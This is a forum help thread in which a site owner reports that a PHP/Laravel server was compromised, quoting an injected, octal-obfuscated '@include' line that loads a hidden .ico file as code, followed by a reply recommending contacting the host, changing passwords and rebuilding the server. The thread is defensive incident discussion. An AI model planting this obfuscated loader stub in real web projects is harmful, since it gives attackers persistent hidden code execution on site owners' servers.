Malware - my php files on apache server is being changed 🙈

i checked my files and saw index.html changed to index.html.bak.bak and there was a index.php
This strange files have some encrypted code. Such as this: index.php
This case brokes my other php web apps. Some of my laravel apps index files got injected with these lines

<?php /*ab8d0*/ @include "\057h\157m\145/\141g\162o\165p\057p\165b\154i\143_\150t\155l\057P\162i\166a\143y\137P\157l\151c\171/\141s\163e\164s\057b\157o\164s\164r\141p\055m\141t\145r\151a\154-\144e\163i\147n\055f\157n\164/\056e\1411\1417\1459\071.\151c\157"; /*ab8d0*/ 🙏 I don't know how to solve or how to research this thing. If anyone knows about this, please help me. I'll be glad. 🙏

This is not Hype related, though it really, really sux if my initial reaction to this is true: your account is hacked someway. (This is not on your local server, right?)

Assuming you’re hacked and this is not flunky server behavior you now cannot trust a single file on that server. I would start by contacting your hosting provider (I pray it’s not godaddy) and figure out HOW they got into your account and plug that hole.

Secondly and this is going to hurt, the only way to be really sure after you changed all your passwords, is to start over. Wipe everything and rebuild from the ground up because you cannot know what they touched. You might get “lucky” and this crap is only in a few files which you may be able to replace with older backups but like I wrote you don’t know what’s been corrupted.

• Contact hosting provider
• Plug security hole
• Wipe the server and start over if you don’t wipe you need to check everything, databases, .htaccess file etc. and get rid of garbage code.